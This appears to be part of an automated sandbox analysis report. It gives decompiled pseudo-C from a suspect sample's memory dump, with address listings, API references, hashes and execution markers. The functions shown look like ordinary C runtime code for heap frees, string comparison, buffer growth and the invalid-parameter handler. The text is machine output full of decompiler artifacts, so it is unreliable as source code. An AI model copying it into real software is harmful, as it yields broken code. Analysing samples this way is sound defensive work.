															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E001A016C();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0x1c3014; // 0x88921fa2
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E001A5D71(_t386, _t424) + 0x278;
																_t287 = E001A3A48(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E001A871A(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E001AB4FE(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E001A016C();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E001A84AC(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E001A3765(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E001AB3FB(__eflags, _v712, 1, 0x1b7188, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E00199981( &_v536,  *0x1c3194, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x1b7210; // 0x1970d1
																					 *0x1b4134(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x1c3268;
																						if(_t402 == 0x1c3268) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E001A71B2( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E001A71B2( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E001A71B2( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E001A71B2( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E001A71B2(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E00197F14(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E00198857();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E00197F14(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x001a3ed2
0x001a3eda
0x001a3edb
0x001a3ee4
0x001a3ee7
0x001a3eec
0x001a3eee
0x001a3ef0
0x001a3ef3
0x001a4010
0x001a4013
0x001a3ef9
0x001a3ef9
0x001a3efa
0x001a3efc
0x001a3efc
0x001a3eff
0x001a3f02
0x001a3f05
0x001a3f08
0x001a3f0a
0x001a3f0d
0x001a3f12
0x001a3f20
0x001a3f2a
0x001a3f2d
0x001a3f30
0x001a3f30
0x001a3f3b
0x001a3f40
0x001a3f45
0x00000000
0x001a3f4b
0x001a3f4e
0x001a3f4e
0x001a3f51
0x001a3f53
0x001a3f56
0x001a3f58
0x001a3f58
0x001a3f58
0x001a3f5b
0x001a3f5b
0x001a3f5b
0x001a3f61
0x00000000
0x00000000
0x001a3f66
0x001a3f7d
0x001a3f7d
0x001a3f68
0x001a3f68
0x001a3f70
0x00000000
0x001a3f72
0x001a3f72
0x001a3f75
0x001a3f7b
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3f7b
0x001a3f70
0x001a3f86
0x001a3f86
0x001a3f8b
0x001a3f90
0x001a3f94
0x001a3fa0
0x001a3fa3
0x001a3fa6
0x001a3fb0
0x001a3fb8
0x001a3fc0
0x00000000
0x001a3fc6
0x001a3fca
0x001a4015
0x001a401e
0x001a4021
0x001a4023
0x001a4027
0x001a402b
0x001a4030
0x001a4035
0x001a402b
0x001a4039
0x001a403b
0x001a403d
0x001a4041
0x001a4042
0x001a4047
0x001a404c
0x001a4042
0x001a404f
0x001a4052
0x001a4055
0x001a4058
0x001a405b
0x001a3fcc
0x001a3fcf
0x001a3fd2
0x001a3fd4
0x001a3fd8
0x001a3fdc
0x001a3fe1
0x001a3fe6
0x001a3fdc
0x001a3fec
0x001a3fee
0x001a3ff3
0x001a3ff8
0x001a3ffd
0x001a3ff3
0x001a3ffe
0x001a4002
0x001a4002
0x001a4005
0x001a4009
0x001a400c
0x001a400c
0x00000000
0x001a400f
0x00000000
0x001a3fc0
0x001a3f81
0x001a3f83
0x001a3f83
0x00000000
0x001a3f83
0x001a4062
0x001a4063
0x001a4064
0x001a4065
0x001a4066
0x001a4067
0x001a406c
0x001a4070
0x001a4072
0x001a4078
0x001a407f
0x001a4082
0x001a4085
0x001a4086
0x001a4087
0x001a408a
0x001a408b
0x001a408e
0x001a4094
0x001a4096
0x001a40bb
0x001a40c5
0x001a40cb
0x001a40cd
0x001a40d3
0x001a40d5
0x001a4335
0x001a4336
0x00000000
0x001a40db
0x001a40db
0x001a40df
0x001a424d
0x001a426a
0x001a426f
0x001a4272
0x001a4274
0x001a427a
0x001a427a
0x001a427c
0x001a427f
0x001a4281
0x001a4287
0x001a4287
0x001a4289
0x001a4310
0x001a4310
0x001a428f
0x001a428f
0x001a4291
0x001a4297
0x001a429a
0x001a429d
0x001a42a3
0x00000000
0x00000000
0x001a42a5
0x001a42a9
0x001a42d2
0x001a42d2
0x001a42d4
0x001a42ab
0x001a42ab
0x001a42af
0x001a42b3
0x001a42ba
0x001a42c0
0x00000000
0x001a42c2
0x001a42c2
0x001a42c5
0x001a42c8
0x001a42d0
0x00000000
0x00000000
0x00000000
0x00000000
0x001a42d0
0x001a42c0
0x001a42df
0x001a42df
0x001a42e1
0x001a430f
0x001a430f
0x00000000
0x001a42e3
0x001a42e3
0x001a42e9
0x001a42ea
0x001a42eb
0x001a42ec
0x001a42f1
0x001a42f7
0x001a42fa
0x001a42fc
0x001a4303
0x001a4305
0x001a4307
0x001a42fe
0x001a42fe
0x001a42ff
0x00000000
0x001a42ff
0x001a42fc
0x00000000
0x001a42e1
0x001a42d8
0x001a42da
0x001a42dd
0x001a42dd
0x00000000
0x001a42dd
0x001a4316
0x001a4316
0x001a4317
0x001a431a
0x001a4320
0x001a4320
0x001a4329
0x001a432b
0x00000000
0x001a432d
0x001a432d
0x001a432f
0x00000000
0x001a4331
0x001a4331
0x001a4331
0x001a432f
0x001a432b
0x00000000
0x001a40e5
0x001a40e5
0x001a40ea
0x00000000
0x001a40f0
0x001a40f0
0x001a40f5
0x00000000
0x001a40fb
0x001a40fb
0x001a4101
0x001a4106
0x001a4108
0x001a410f
0x001a4110
0x001a4112
0x00000000
0x00000000
0x001a4118
0x001a4118
0x001a411c
0x001a4122
0x00000000
0x001a4128
0x001a412a
0x001a412b
0x001a412e
0x00000000
0x001a4134
0x001a4134
0x001a413a
0x001a413f
0x001a4149
0x001a414d
0x001a4152
0x001a4155
0x001a4157
0x00000000
0x001a4159
0x001a4159
0x001a415b
0x001a415e
0x001a415e
0x001a4161
0x001a4164
0x001a4164
0x001a416f
0x001a4171
0x001a4173
0x00000000
0x00000000
0x001a4173
0x00000000
0x001a4175
0x001a4175
0x001a417b
0x001a417e
0x001a417e
0x001a418c
0x001a4195
0x001a419a
0x001a41a0
0x001a41a3
0x001a41a4
0x001a41a6
0x001a41b4
0x001a41b4
0x001a41bb
0x001a421c
0x00000000
0x001a41bd
0x001a41bd
0x001a41cb
0x001a41d0
0x001a41d3
0x001a41d5
0x001a4350
0x001a4352
0x001a4353
0x001a4354
0x001a4355
0x001a4356
0x001a4357
0x001a435c
0x001a435f
0x001a4360
0x001a4368
0x001a436f
0x001a4372
0x001a4373
0x001a4376
0x001a437a
0x001a437b
0x001a437e
0x001a438e
0x001a43b1
0x001a43b6
0x001a43b9
0x001a43bb
0x001a4671
0x001a4671
0x001a4671
0x00000000
0x001a43c1
0x001a43c1
0x001a43c4
0x001a43c4
0x001a43c7
0x001a43cd
0x001a43d3
0x001a43d6
0x001a43d8
0x001a43db
0x001a43e2
0x001a43e5
0x001a43eb
0x00000000
0x00000000
0x001a43ed
0x001a43f1
0x001a441a
0x001a441a
0x001a43f3
0x001a43f3
0x001a43f7
0x001a43fb
0x001a4402
0x001a4408
0x00000000
0x001a440a
0x001a440a
0x001a440d
0x001a4410
0x001a4418
0x00000000
0x00000000
0x00000000
0x00000000
0x001a4418
0x001a4408
0x001a4427
0x001a4427
0x001a4429
0x001a4432
0x001a4438
0x001a443b
0x001a443b
0x001a443e
0x001a4441
0x001a4441
0x001a4451
0x001a445f
0x001a4464
0x001a446b
0x001a446d
0x00000000
0x001a4473
0x001a4479
0x001a4486
0x001a448f
0x001a4495
0x001a44a2
0x001a44a9
0x001a44ae
0x001a44b1
0x001a44b3
0x001a46f1
0x001a46f7
0x001a46f8
0x001a46f9
0x001a46fa
0x001a46fb
0x001a46fc
0x001a4701
0x001a4704
0x001a4707
0x001a4708
0x001a471a
0x001a471f
0x001a4721
0x001a472a
0x00000000
0x001a472a
0x001a4723
0x001a4726
0x001a4728
0x00000000
0x00000000
0x001a4730
0x001a44b9
0x001a44b9
0x001a44c7
0x001a44ca
0x001a44e0
0x001a44e7
0x001a44ec
0x001a44cc
0x001a44cc
0x001a44d4
0x00000000
0x001a44d6
0x001a44d6
0x001a44dc
0x001a44dc
0x001a44d4
0x001a44f3
0x001a44fa
0x001a44fd
0x001a45fb
0x001a45fe
0x001a460b
0x001a460e
0x001a4616
0x001a4616
0x001a4600
0x001a4606
0x001a4606
0x001a4503
0x001a4503
0x001a450f
0x001a4515
0x001a451b
0x001a451e
0x001a4524
0x001a4527
0x001a452a
0x00000000
0x00000000
0x001a452c
0x001a4535
0x001a4539
0x001a4542
0x001a4546
0x001a4547
0x001a454d
0x001a4553
0x001a4559
0x001a455c
0x00000000
0x00000000
0x001a455e
0x001a457d
0x001a457d
0x001a4580
0x001a459d
0x001a45a2
0x001a45a5
0x001a45a7
0x001a45e5
0x001a45a9
0x001a45a9
0x001a45af
0x001a45b4
0x001a45bc
0x001a45bd
0x001a45bd
0x001a45d4
0x001a45db
0x001a45de
0x001a45e0
0x001a45e0
0x001a45eb
0x001a45f1
0x001a45f1
0x001a45f6
0x00000000
0x001a45f6
0x001a4560
0x001a4562
0x001a4567
0x001a456d
0x001a4576
0x001a4579
0x001a4579
0x00000000
0x001a4562
0x001a4619
0x001a4619
0x001a461d
0x001a4625
0x001a462b
0x001a462e
0x001a4634
0x001a4636
0x001a4682
0x001a4688
0x001a46d4
0x001a46d4
0x001a468a
0x001a468f
0x001a468f
0x001a4695
0x001a4699
0x00000000
0x001a469b
0x001a469f
0x001a46a8
0x001a46b4
0x001a46b9
0x001a46c2
0x001a46c8
0x001a46cb
0x001a46cb
0x001a4699
0x001a46da
0x001a46e2
0x001a46e8
0x001a46eb
0x001a4638
0x001a463e
0x001a4648
0x001a465a
0x001a4661
0x001a466e
0x00000000
0x001a466e
0x00000000
0x001a4636
0x001a44b3
0x001a442b
0x001a442b
0x001a4673
0x001a4676
0x001a4677
0x001a4678
0x001a467a
0x001a4681
0x001a4681
0x00000000
0x001a4429
0x001a4422
0x001a4424
0x001a4424
0x00000000
0x001a4424
0x001a41db
0x001a41db
0x001a41de
0x001a41e3
0x001a434b
0x00000000
0x001a41e9
0x001a41eb
0x001a41f3
0x001a41f9
0x001a41fa
0x001a4200
0x001a4201
0x001a4206
0x001a420c
0x001a420f
0x001a4211
0x001a4213
0x001a4214
0x001a4214
0x001a4222
0x001a4222
0x001a4225
0x001a4228
0x001a422a
0x001a422d
0x001a422f
0x001a422f
0x001a4232
0x001a4232
0x001a4235
0x001a4238
0x00000000
0x001a423e
0x001a423e
0x001a4240
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001a4240
0x001a4238
0x001a41e3
0x001a41d5
0x001a41a8
0x001a41aa
0x001a41ab
0x001a41ae
0x00000000
0x00000000
0x00000000
0x00000000
0x001a41ae
0x001a41a6
0x001a412e
0x00000000
0x001a4122
0x001a4246
0x00000000
0x001a4246
0x001a40f5
0x001a40ea
0x001a40df
0x001a4098
0x001a4098
0x001a409a
0x001a40b1
0x001a409c
0x001a409c
0x001a409d
0x001a409e
0x001a409f
0x001a40a4
0x001a433c
0x001a433f
0x001a4340
0x001a4341
0x001a4343
0x001a434a
0x001a434a
0x001a4096
0x00000000

APIs

Part of subcall function 001A871A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00198B75,?,?,?,?,?,00191221,?,?), ref: 001A874C

_free.LIBCMT ref: 001A3FE1
_free.LIBCMT ref: 001A3FF8
_free.LIBCMT ref: 001A4015
_free.LIBCMT ref: 001A4030
_free.LIBCMT ref: 001A4047

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 1df4141f2d11db63e4512cf12ad92c3153a2a576990a252d6713474bd65ad180
Instruction ID: e2b51cc021b7f04f51e35b7f8773f6ac1ace84b8e0d173bb9a9c56c72ed48469
Opcode Fuzzy Hash: 1df4141f2d11db63e4512cf12ad92c3153a2a576990a252d6713474bd65ad180
Instruction Fuzzy Hash: 8851F13AA00304AFDB21DF29CC41BAAB7F5EF96720F144569F915D7290E771EA00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00194E63 Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00194E63(void* __ebx, void* __edx, void* __edi, void* __eflags, void _a4) {
				void* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v20;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				char _v56;
				intOrPtr _v60;
				signed int __esi;
				signed int _t53;
				void* _t68;
				intOrPtr* _t75;
				void* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t83;
				signed int _t86;
				signed int _t89;

				_t76 = __edx;
				_t86 = _t89;
				_t53 =  *0x1c3014; // 0x88921fa2
				_v8 = _t53 ^ _t86;
				_push(__ebx);
				_push(__edi);
				E00195D4D( &_v12, 0);
				_v16 =  *0x1f1144;
				_t81 = E0019181F(_a4, E0019178E(_a4, 0x1f03a4, __edx,  *0x1f1144));
				if(_t81 != 0) {
					L6:
					E00195DA5( &_v12);
					_pop(_t79);
					_pop(_t82);
					__eflags = _v8 ^ _t86;
					_pop(_t68);
					return E00197F14(_t81, _t68, _v8 ^ _t86, _t76, _t79, _t82);
				} else {
					__eflags = __edi;
					if(__edi == 0) {
						__eax =  &_v16;
						__eax = E00191937(__ebx,  &_v16, __ebx); // executed
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __eax - 0xffffffff;
						if(__eflags == 0) {
							__eax = E00191664();
							asm("int3");
							_push(__ebp);
							__ebp = __esp;
							__esp = __esp - 0xc;
							__eax =  *0x1c3014; // 0x88921fa2
							_v32 = __eax;
							_push(__ebx);
							__ebx = _v20;
							__ecx =  &_v36;
							_push(__esi);
							_push(__edi);
							__eax = E00195D4D( &_v36, 0);
							__edi =  *0x1f1148;
							__ecx = 0x1f1150;
							_v40 = __edi;
							__eax = E0019178E(__ebx, 0x1f1150, __edx, __edi);
							__ecx = __ebx;
							__esi = __eax;
							__eflags = __esi;
							if(__esi != 0) {
								L13:
								__ecx =  &_v16;
								__eax = E00195DA5( &_v16);
								__ecx = _v12;
								__eax = __esi;
								_pop(__edi);
								_pop(__esi);
								__ecx = _v12 ^ __ebp;
								__eflags = __ecx;
								_pop(__ebx);
								__eax = E00197F14(__esi, __ebx, __ecx, __edx, __edi, __esi);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
							} else {
								__eflags = __edi;
								if(__edi == 0) {
									__eax =  &_v20;
									__eax = E0019568F(__ebx,  &_v20, __ebx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax - 0xffffffff;
									if(__eflags == 0) {
										__eax = E00191664();
										asm("int3");
										_push(0x18);
										0x1b36f5 = E0019826F(0x1b36f5, __ebx, __edi, __esi);
										__ebx = __ecx;
										__eax = _v0;
										_v32 = __eax;
										__eax = __eax -  *__ebx;
										_v28 = __eax;
										 *(__ebx + 4) =  *(__ebx + 4) -  *__ebx;
										__eax =  *(__ebx + 4) -  *__ebx >> 2;
										__esi = 0x3fffffff;
										__eflags = __eax - 0x3fffffff;
										if(__eflags == 0) {
											__eax = E001956D9(__ebx, __ecx, __edi, __eflags);
											goto L25;
										} else {
											__edi = __eax + 1;
											_v40 = __edi;
											 *(__ebx + 8) =  *(__ebx + 8) -  *__ebx;
											__ecx =  *(__ebx + 8) -  *__ebx >> 2;
											__edx = __ecx;
											__edx = __ecx >> 1;
											0x3fffffff = 0x3fffffff - __edx;
											__eflags = __ecx - 0x3fffffff - __edx;
											if(__ecx <= 0x3fffffff - __edx) {
												__eax = __ecx + __edx;
												__esi = __edi;
												__eflags = __eax - __edi;
												__esi =  >=  ? __eax : __edi;
												_v36 = __esi;
												__eflags = __esi - 0x3fffffff;
												if(__esi > 0x3fffffff) {
													L25:
													L1();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													__eax = _v36;
													__ecx = __eax + 0x23;
													__eflags = __ecx - __eax;
													if(__eflags <= 0) {
														_push(_t86);
														_t75 =  &_v56;
														E001912A6(_t75);
														E0019938D( &_v56, 0x1c2844);
														asm("int3");
														_push(_t81);
														_t83 = _t75;
														E00191234(_t75, _v60);
														 *_t83 = 0x1b4288;
														return _t83;
													} else {
														__eax = E00197F22(__esi, __eflags, __ecx);
														_pop(__ecx);
														__ecx = __eax;
														__eflags = __ecx;
														if(__eflags == 0) {
															_push(__esi);
															__esi = __esi ^ __esi;
															__eax = E001A00DB(__ecx, __esi, __eflags, __esi, __esi, __esi, __esi, __esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															L31();
															asm("int3");
															__eax = IsProcessorFeaturePresent(0x17);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx = 5;
																asm("int 0x29");
															}
															__esi = 0xc0000417;
															__eax = E0019FF93(__ebx, __edx, 0xc0000417, 2, 0xc0000417, 1);
															__eax = GetCurrentProcess();
															__eax = TerminateProcess(__eax, 0xc0000417);
															__esi = __esi;
															return __eax;
														} else {
															_t51 = __ecx + 0x23; // 0x23
															__eax = _t51;
															__eax = _t51 & 0xffffffe0;
															__eflags = __eax;
															 *(__eax - 4) = __ecx;
															return __eax;
														}
													}
												} else {
													goto L18;
												}
											} else {
												_v36 = 0x3fffffff;
												L18:
												__edi = E00192AAC(__ebx, __ebp, __esi << 2);
												_v44 = __edi;
												_v12 = _v12 & 0x00000000;
												__eax = _v28;
												__eax = __edi + _v28 * 4;
												_v28 = __eax;
												_a4 =  *_a4;
												 *__eax =  *_a4;
												__eax =  *(__ebx + 4);
												__ecx = _v32;
												__eflags = __ecx - __eax;
												if(__ecx != __eax) {
													__eax = E00198BD0(__edi,  *__ebx, __ecx);
													_v28 = _v28 + 4;
													__eax =  *(__ebx + 4);
													__edx = _v32;
													__eax =  *(__ebx + 4) - __edx;
													__eflags = __eax;
													_push(__eax);
													_push(__edx);
													_push(_v28 + 4);
												} else {
													_push(__eax);
													_push( *__ebx);
													_push(__edi);
												}
												__eax = E00198BD0();
												__esp = __esp + 0xc;
												_t45 =  &_v12;
												 *_t45 = _v12 | 0xffffffff;
												__eflags =  *_t45;
												__ecx = __ebx;
												__eax = E001956E4(__ebx, __edi, _v40, __esi);
												__eax = _v28;
												return E001981D4(_v28);
											}
										}
									} else {
										__esi = _v20;
										E00196014(__eflags, __esi) =  *__esi;
										__ecx = __esi;
										__eax =  *((intOrPtr*)( *__esi + 4))();
										 *0x1f1148 = __esi;
										goto L13;
									}
								} else {
									__esi = __edi;
									goto L13;
								}
							}
						} else {
							__esi = _v16;
							E00196014(__eflags, __esi) =  *__esi;
							__ecx = __esi;
							__eax =  *((intOrPtr*)( *__esi + 4))();
							 *0x1f1144 = __esi;
							goto L6;
						}
					} else {
						__esi = __edi;
						goto L6;
					}
				}
			}

0x00194e63
0x00194e64
0x00194e69
0x00194e70
0x00194e73
0x00194e7b
0x00194e7e
0x00194e8e
0x00194e9e
0x00194ea2
0x00194ed4
0x00194ed7
0x00194ee1
0x00194ee2
0x00194ee3
0x00194ee5
0x00194eec
0x00194ea4
0x00194ea4
0x00194ea6
0x00194eac
0x00194eb1
0x00194eb6
0x00194eb7
0x00194eb8
0x00194ebb
0x00194eed
0x00194ef2
0x00194ef3
0x00194ef4
0x00194ef6
0x00194ef9
0x00194f00
0x00194f03
0x00194f04
0x00194f07
0x00194f0a
0x00194f0b
0x00194f0e
0x00194f13
0x00194f19
0x00194f1e
0x00194f21
0x00194f27
0x00194f2e
0x00194f30
0x00194f32
0x00194f64
0x00194f64
0x00194f67
0x00194f6c
0x00194f6f
0x00194f71
0x00194f72
0x00194f73
0x00194f73
0x00194f75
0x00194f76
0x00194f7b
0x00194f7b
0x00194f7c
0x00194f34
0x00194f34
0x00194f36
0x00194f3c
0x00194f41
0x00194f46
0x00194f47
0x00194f48
0x00194f4b
0x00194f7d
0x00194f82
0x00194f83
0x00194f8a
0x00194f8f
0x00194f91
0x00194f94
0x00194f97
0x00194f9c
0x00194fa2
0x00194fa4
0x00194fa7
0x00194fac
0x00194fae
0x00195075
0x00000000
0x00194fb4
0x00194fb4
0x00194fb7
0x00194fbd
0x00194fbf
0x00194fc2
0x00194fc4
0x00194fc8
0x00194fca
0x00194fcc
0x00195008
0x0019500b
0x0019500d
0x0019500f
0x00195012
0x00195015
0x0019501b
0x0019507a
0x0019507a
0x0019507f
0x00195080
0x00195081
0x00195082
0x00195083
0x00195084
0x00195085
0x00195089
0x0019508c
0x0019508e
0x001912be
0x001912c4
0x001912c7
0x001912d5
0x001912da
0x001912db
0x001912e0
0x001912e2
0x001912e7
0x001912f0
0x00195094
0x00195095
0x0019509a
0x0019509b
0x0019509d
0x0019509f
0x001a0151
0x001a0152
0x001a0159
0x001a0161
0x001a0162
0x001a0163
0x001a0164
0x001a0165
0x001a0166
0x001a016b
0x001a016e
0x001a0174
0x001a0176
0x001a017a
0x001a017b
0x001a017b
0x001a0180
